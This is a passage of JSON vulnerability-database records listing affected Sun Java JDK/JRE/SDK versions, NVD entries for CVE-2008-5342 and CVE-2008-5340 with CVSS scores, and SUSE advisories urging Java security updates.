"cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", 
"description": "Unspecified vulnerability in the BasicService for Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted downloaded applications to cause local files to be displayed in the browser of the user of the untrusted application via unknown vectors, aka 6767668.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5342", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5342"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", 
"cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5342", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5342", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted JWS applications to gain privileges to access local files or applications via unknown vectors, aka 6727081.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5340", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5340"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", 
"cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5340", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5340", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}], "suse": [{"lastseen": "2016-09-04T12:35:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The IBM Java 1.4.2 JDK and JRE were brought to Service Release 13 and the IBM JDK and JRE 6 were brought to Service Release 4.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-04-07T14:51:07", "published": "2009-04-07T14:51:07", "id": "SUSE-SA:2009:018", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00004.html", "type": "suse", "title": "remote code execution in IBM Java 1.4.2 and 6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:44", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", 
"CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The IBM Java JRE 5 was brought to Service Release 9 fixing quite a number of security issues and bugs.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-01-29T14:08:00", "published": "2009-01-29T14:08:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00009.html", "id": "SUSE-SA:2009:007", "title": "local privilege escalation in IBMJava5-JRE,java-1_5_0-ibm", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:22:58", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Sun Java received several security fixes and was updated to: - Sun Java 1.6.0 to Update 11-b03 - Sun Java 1.5.0 to Update 17 - Sun Java 1.4.2 to Update 19 Numerous security issues such as privilege escalations, and sandbox breakouts were fixed. 
